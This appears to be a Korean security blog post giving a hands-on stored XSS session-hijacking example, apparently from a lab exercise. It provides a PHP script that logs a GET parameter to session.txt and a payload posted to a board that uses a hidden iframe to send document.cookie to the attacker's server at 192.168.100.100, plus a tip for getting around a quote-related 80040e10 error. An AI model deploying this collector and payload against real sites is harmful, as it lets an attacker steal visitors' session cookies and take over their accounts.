728x90
웹 보안 Cross-Site Scripting(XSS) 세션 탈취 예제
📍 순서
1. get.php 생성.
<?php
$data = $_GET['data'];
$myfile = fopen("session.txt", "a") or die("Unable to open file!");
fwrite($myfile, $data."\n");
fclose($myfile);
?>
2. 값 테스트
3. 글쓰기
<iframe id="test" style="width:0px; height:0px"></iframe>
<script>document.getElementById("test").setAttribute("src","http://192.168.100.100/get.php?data="+document.cookie)</script>
4. 서버 재시작
5. 세션 값 확인
* 80040e10 에러 이유 & 해결방법:
이렇게 하면 에러가 난다.
이유는 얘가 ' 작은 따옴표 인식을 못하기 때문..
그래서 전부 " 쌍따옴표로 바꿔주면 해결된다.
혹은 그냥 글을 쓰고,
수정하기로 다시 쓸 때 작은 따옴표를 넣어줘도 되더라.
728x90
'☠️ 보안' 카테고리의 다른 글
| [암호화] 양방향(공개키/비대칭키, 비공개키/대칭키), 단방향 (0) | 2022.11.14 |
|---|---|
| Session Hijacking 이란? (0) | 2022.04.18 |
| SSL 취약점을 이용한 공격, Heart bleeds(하트블리드) 실습과 웹 세션 하이재킹 (2) (0) | 2021.07.22 |
| SSL 취약점을 이용한 공격, Heart bleeds(하트블리드) 실습 (1) (0) | 2021.07.20 |
댓글